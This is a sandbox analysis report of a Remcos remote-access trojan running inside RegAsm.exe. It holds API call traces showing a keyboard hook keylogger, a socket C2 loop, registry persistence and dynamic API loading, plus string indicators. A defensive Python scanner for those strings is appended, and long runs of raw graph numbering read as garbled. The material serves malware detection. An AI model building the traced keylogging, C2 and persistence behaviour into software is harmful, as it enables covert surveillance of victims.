48519->48520 48520->48509 48522 41c495 
CreateFileW 48521->48522 48524 41c4d2 48522->48524 48525 41c4ce 48522->48525 48526 41c4f2 WriteFile 48524->48526 48527 41c4d9 SetFilePointer 48524->48527 48525->48495 48529 41c505 48526->48529 48530 41c507 CloseHandle 48526->48530 48527->48526 48528 41c4e9 CloseHandle 48527->48528 48528->48525 48529->48530 48530->48525 48531->48499 48532->48499 48533->48516 48536 40322e 48535->48536 48545 403618 48536->48545 48538 40323b 48538->48368 48540 40326e 48539->48540 48541 402252 11 API calls 48540->48541 48542 403288 48541->48542 48543 402336 11 API calls 48542->48543 48544 403031 48543->48544 48544->47905 48546 403626 48545->48546 48547 403644 48546->48547 48548 40362c 48546->48548 48550 40365c 48547->48550 48551 40369e 48547->48551 48556 4036a6 28 API calls 48548->48556 48554 4027e6 28 API calls 48550->48554 48555 403642 48550->48555 48557 4028a4 22 API calls 48551->48557 48554->48555 48555->48538 48556->48555 48559 404186 48558->48559 48560 402252 11 API calls 48559->48560 48561 404191 48560->48561 48569 4041bc 48561->48569 48564 4042fc 48580 404353 48564->48580 48566 40430a 48567 403262 11 API calls 48566->48567 48568 404319 48567->48568 48568->47913 48570 4041c8 48569->48570 48573 4041d9 48570->48573 48572 40419c 48572->48564 48574 4041e9 48573->48574 48575 404206 48574->48575 48576 4041ef 48574->48576 48577 4027e6 28 API calls 48575->48577 48578 404267 28 API calls 48576->48578 48579 404204 48577->48579 48578->48579 48579->48572 48581 40435f 48580->48581 48584 404371 48581->48584 48583 40436d 48583->48566 48585 40437f 48584->48585 48586 404385 48585->48586 48587 40439e 48585->48587 48650 4034e6 28 API calls 48586->48650 48588 402888 22 API calls 48587->48588 48589 4043a6 48588->48589 48591 404419 48589->48591 48592 4043bf 48589->48592 48651 4028a4 22 API calls 48591->48651 48595 4027e6 28 API calls 48592->48595 48603 40439c 48592->48603 48595->48603 48603->48583 48650->48603 48658 43ab1a 48652->48658 48656 4138f4 48655->48656 48657 4138ca RegSetValueExA RegCloseKey 
48655->48657 48656->47929 48657->48656 48661 43aa9b 48658->48661 48660 40170d 48660->47931 48662 43aaaa 48661->48662 48663 43aabe 48661->48663 48667 44062d 20 API calls _Atexit 48662->48667 48666 43aaaf __alldvrm ___std_exception_copy 48663->48666 48668 4489d7 11 API calls 2 library calls 48663->48668 48666->48660 48667->48666 48668->48666 48670 41b98a ctype ___scrt_fastfail 48669->48670 48671 402093 28 API calls 48670->48671 48672 414f84 48671->48672 48672->47938 48673->47955 48675 414f33 48674->48675 48676 414f3d getaddrinfo WSASetLastError 48674->48676 48791 414dc1 29 API calls ___std_exception_copy 48675->48791 48676->47983 48678 414f38 48678->48676 48680 404846 socket 48679->48680 48681 404839 48679->48681 48683 404860 CreateEventW 48680->48683 48684 404842 48680->48684 48792 40489e WSAStartup 48681->48792 48683->47983 48684->47983 48685 40483e 48685->48680 48685->48684 48687 404f65 48686->48687 48688 404fea 48686->48688 48689 404f6e 48687->48689 48690 404fc0 CreateEventA CreateThread 48687->48690 48691 404f7d GetLocalTime 48687->48691 48688->47983 48689->48690 48690->48688 48795 405150 48690->48795 48793 41bc1f 28 API calls 48691->48793 48693 404f91 48794 4052fd 28 API calls 48693->48794 48702 404a1b 48701->48702 48703 4048ee 48701->48703 48704 40497e 48702->48704 48705 404a21 WSAGetLastError 48702->48705 48703->48704 48706 404923 48703->48706 48708 40531e 28 API calls 48703->48708 48704->47983 48705->48704 48707 404a31 48705->48707 48799 420cf1 27 API calls 48706->48799 48709 404932 48707->48709 48710 404a36 48707->48710 48712 40490f 48708->48712 48715 402093 28 API calls 48709->48715 48810 41cb72 30 API calls 48710->48810 48716 402093 28 API calls 48712->48716 48714 40492b 48714->48709 48718 404941 48714->48718 48719 404a80 48715->48719 48720 40491e 48716->48720 48717 404a40 48811 4052fd 28 API calls 48717->48811 48725 404950 48718->48725 48726 404987 48718->48726 48722 402093 28 API calls 48719->48722 48723 41b580 80 API calls 48720->48723 48727 404a8f 
control_flow_graph (continuation of the node/edge listing from the preceding function graphs; graph data not rendered. Recoverable API nodes: 4049f9 CreateEventW, 404e40 SetEvent CloseHandle, 404e57 closesocket, 404e8c WaitForSingleObject, 41d8ec/41e4d2/41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection, 40f891 Sleep, 41288b TerminateProcess WaitForSingleObject, 40f903 ExitProcess, 446259 HeapReAlloc, 4461e1 RtlAllocateHeap, 426d59 send, 426d42 recv, 4338c8 CryptAcquireContextA, 4338e9 CryptGenRandom, 4338fe CryptReleaseContext)

                                                  Control-flow Graph

                                                  APIs
                                                  • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                  • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                  • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                  • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                  • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                  • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                  • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                  • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                  • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD17
                                                  • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040EA1C), ref: 0041CD28
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD2B
                                                  • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD3B
                                                  • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD4B
                                                  • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040EA1C), ref: 0041CD5D
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD60
                                                  • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040EA1C), ref: 0041CD6D
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD70
                                                  • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD84
                                                  • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD98
                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,0040EA1C), ref: 0041CDAA
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDAD
                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040EA1C), ref: 0041CDBA
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDBD
                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040EA1C), ref: 0041CDCA
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDCD
                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040EA1C), ref: 0041CDDA
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDDD
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad$HandleModule
                                                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                  • API String ID: 4236061018-3687161714
                                                  • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                  • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                                  • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                  • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE

                                                  Control-flow Graph

                                                  control_flow_graph 1277 for function 40a2f3-40a3a1 (node/edge listing and Executed/Not Executed legend not rendered; API nodes: 40a30c GetModuleHandleA SetWindowsHookExA, 40a328 GetLastError, 40a36e GetMessageA, 40a380 TranslateMessage DispatchMessageA)
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                  • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                  • GetLastError.KERNEL32 ref: 0040A328
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A376
                                                  • TranslateMessage.USER32(?), ref: 0040A385
                                                  • DispatchMessageA.USER32(?), ref: 0040A390
                                                  Strings
                                                  • Keylogger initialization failure: error , xrefs: 0040A33C
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                  • String ID: Keylogger initialization failure: error
                                                  • API String ID: 3219506041-952744263
                                                  • Opcode ID: 25e136c2ffc33636d357cd73d29a3aedc6f18b6bf984cd9f7b53386870d4f0b3
                                                  • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                                  • Opcode Fuzzy Hash: 25e136c2ffc33636d357cd73d29a3aedc6f18b6bf984cd9f7b53386870d4f0b3
                                                  • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                    • Part of subcall function 00413584: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 004135C2
                                                    • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                                                  • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                  • ExitProcess.KERNEL32 ref: 0040F905
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseExitOpenProcessQuerySleepValue
                                                  • String ID: 5.1.3 Pro$override$pth_unenc
                                                  • API String ID: 2281282204-1392497409
                                                  • Opcode ID: 3fa15e960bbc6a4ad227c554a9012a3cdb08db0b8ab9406bce24a23a70318cf6
                                                  • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                                  • Opcode Fuzzy Hash: 3fa15e960bbc6a4ad227c554a9012a3cdb08db0b8ab9406bce24a23a70318cf6
                                                  • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF

                                                  Control-flow Graph

                                                  control_flow_graph 1426 for function 404f51-404ff1 (node/edge listing and Executed/Not Executed legend not rendered; API nodes: 404f7d GetLocalTime, 404fc0 CreateEventA CreateThread)
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?), ref: 00404F81
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                  Strings
                                                  • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$EventLocalThreadTime
                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                  • API String ID: 2532271599-1507639952
                                                  • Opcode ID: 0f2139c50ef680eb2eec6eafdf8633bec5d9f7b08799dddc17b73162f3ba6cee
                                                  • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                                  • Opcode Fuzzy Hash: 0f2139c50ef680eb2eec6eafdf8633bec5d9f7b08799dddc17b73162f3ba6cee
                                                  • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                                  APIs
                                                  • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,00DE69C0), ref: 004338DA
                                                  • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                  • String ID:
                                                  • API String ID: 1815803762-0
                                                  • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                  • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                  • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                  • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                  APIs
                                                  • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B6BB
                                                  • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Name$ComputerUser
                                                  • String ID:
                                                  • API String ID: 4229901323-0
                                                  • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                  • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                                  • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                  • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8

                                                  Control-flow Graph

                                                  control_flow_graph 5 for function 40ea00-40f3ea (node/edge listing and Executed/Not Executed legend not rendered; API nodes: 40ea00 GetModuleFileNameW, 40effe CreateThread, 40f025 StrToIntA, 40f103/40f158/40f1a9/40f27e/40f293/40f2a8 CreateThread, 40f27b SetProcessDEPPolicy, 40f36f Sleep, 40f381 DeleteFileW)
                                                  APIs
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040EA29
                                                    • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                  • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                  • API String ID: 2830904901-3701325316
                                                  • Opcode ID: 75c18c0ccd933b3bae2a3c6af3dc2293cb1f3bb301aba7dba6372688cc0833ab
                                                  • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                                  • Opcode Fuzzy Hash: 75c18c0ccd933b3bae2a3c6af3dc2293cb1f3bb301aba7dba6372688cc0833ab
                                                  • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E

                                                  Control-flow Graph

                                                  • Rendered graph not reproduced; recoverable data: function 00414F65, basic blocks 00414F65-00415B20, Win32 calls in the graph nodes: Sleep, WSAGetLastError, GetTickCount, CreateThread (executed / not-executed colouring lost in extraction)
                                                  APIs
                                                  • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414FB6
                                                  • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                                  • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep$ErrorLastLocalTime
                                                  • String ID: | $%I64u$5.1.3 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                                  • API String ID: 524882891-3785195355
                                                  • Opcode ID: 36ae4ca0ddcce510b1f6f4c43d9f3cdffd11b7a3780b4b315adef822fefe3200
                                                  • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                                                  • Opcode Fuzzy Hash: 36ae4ca0ddcce510b1f6f4c43d9f3cdffd11b7a3780b4b315adef822fefe3200
                                                  • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D
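                                                  The String ID fields of this report's function records (the "Remcos Agent initialized" banner, the "Connecting | " / "Connected | " / "Connection Error: " status prefixes, the "TLS Handshake... |" marker, the "5.1.3 Pro" build string, and further on the "Offline Keylogger Started" banner, the "pth_unenc" registry value and the "fso.DeleteFile(Wscript.ScriptFullName)" self-delete script) are cheap triage indicators for other RegAsm.exe dumps. The following scanner is an added example and not Joe Sandbox or Remcos code: it searches a raw dump for those markers in both ASCII and UTF-16LE (the trace above mixes A and W API variants, so either encoding can occur), widens the version match to any "<major>.<minor>.<patch> <edition>" string (the edition names other than Pro are an assumption, not taken from this report), and derives a verdict from which marker families are present. The dump bytes are constructed inline.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Indicator strings taken from the String ID fields of this report's RegAsm.exe records.
REMCOS_MARKERS = {
    "banner": "Remcos Agent initialized",
    "keylogger": "Offline Keylogger Started",
    "c2_connected": "Connected | ",
    "c2_connecting": "Connecting | ",
    "c2_error": "Connection Error: ",
    "tls_handshake": "TLS Handshake... |",
    "idle_report": " User has been idle for ",
    "reg_value": "pth_unenc",
    "licence_file": "license_code.txt",
    "self_delete_vbs": "fso.DeleteFile(Wscript.ScriptFullName)",
}

# "5.1.3 Pro" is this sample's build marker; Light/Free are assumed edition names.
_EDITIONS = ("Pro", "Light", "Free")


def _version_regex(utf16: bool) -> re.Pattern[bytes]:
    """Build '<d>.<d>.<d> <edition>' as a bytes regex, with a NUL after every char for UTF-16LE."""
    sep = b"\x00" if utf16 else b""
    digits = b"(?:[0-9]" + sep + b")+"
    lit = lambda s: b"".join(re.escape(ch.encode()) + sep for ch in s)
    editions = b"|".join(lit(e) for e in _EDITIONS)
    return re.compile(digits + lit(".") + digits + lit(".") + digits + lit(" ") + b"(?:" + editions + b")")


VERSION_RES = {"ascii": _version_regex(False), "utf-16le": _version_regex(True)}


@dataclass(frozen=True)
class Hit:
    name: str
    offset: int
    encoding: str  # "ascii" or "utf-16le"
    value: str


def scan_dump(data: bytes) -> list[Hit]:
    """Return every marker occurrence in `data`, searching both encodings, sorted by offset."""
    hits: list[Hit] = []
    for name, text in REMCOS_MARKERS.items():
        for enc, codec in (("ascii", "ascii"), ("utf-16le", "utf-16-le")):
            needle = text.encode(codec)
            pos = data.find(needle)
            while pos != -1:
                hits.append(Hit(name, pos, enc, text))
                pos = data.find(needle, pos + 1)
    for enc, rx in VERSION_RES.items():
        codec = "ascii" if enc == "ascii" else "utf-16-le"
        for m in rx.finditer(data):
            hits.append(Hit("version", m.start(), enc, m.group().decode(codec)))
    return sorted(hits, key=lambda h: h.offset)


def capabilities(hits: list[Hit]) -> dict:
    """Collapse hits into the marker families a triage note cares about."""
    names = {h.name for h in hits}
    return {
        "remcos_banner": "banner" in names,
        "version": next((h.value for h in hits if h.name == "version"), None),
        "c2_logging": bool(names & {"c2_connected", "c2_connecting", "c2_error", "tls_handshake"}),
        "keylogger": bool(names & {"keylogger", "idle_report"}),
        "registry_persistence": "reg_value" in names,
        "self_delete": "self_delete_vbs" in names,
    }


def verdict(hits: list[Hit]) -> bool:
    """Confident match: the banner alone, or a version string plus two independent families."""
    caps = capabilities(hits)
    families = sum(bool(caps[k]) for k in ("c2_logging", "keylogger", "registry_persistence", "self_delete"))
    return caps["remcos_banner"] or (caps["version"] is not None and families >= 2)


# Constructed dump: padding with the sample's strings in the encodings seen in the trace.
SAMPLE_DUMP = (
    b"\x00" * 64
    + b"Remcos Agent initialized\x00"
    + b"PADDING" * 8
    + "Offline Keylogger Started".encode("utf-16-le")
    + b"\x00" * 16
    + b"5.1.3 Pro\x00"
    + b"\x90" * 32
    + "Connecting | ".encode("utf-16-le")
    + b"pth_unenc\x00"
    + b"\xcc" * 8
    + b"fso.DeleteFile(Wscript.ScriptFullName)\r\n"
)

if __name__ == "__main__":
    found = scan_dump(SAMPLE_DUMP)
    for h in found:
        print(f"{h.offset:08x} {h.encoding:9} {h.name:16} {h.value!r}")
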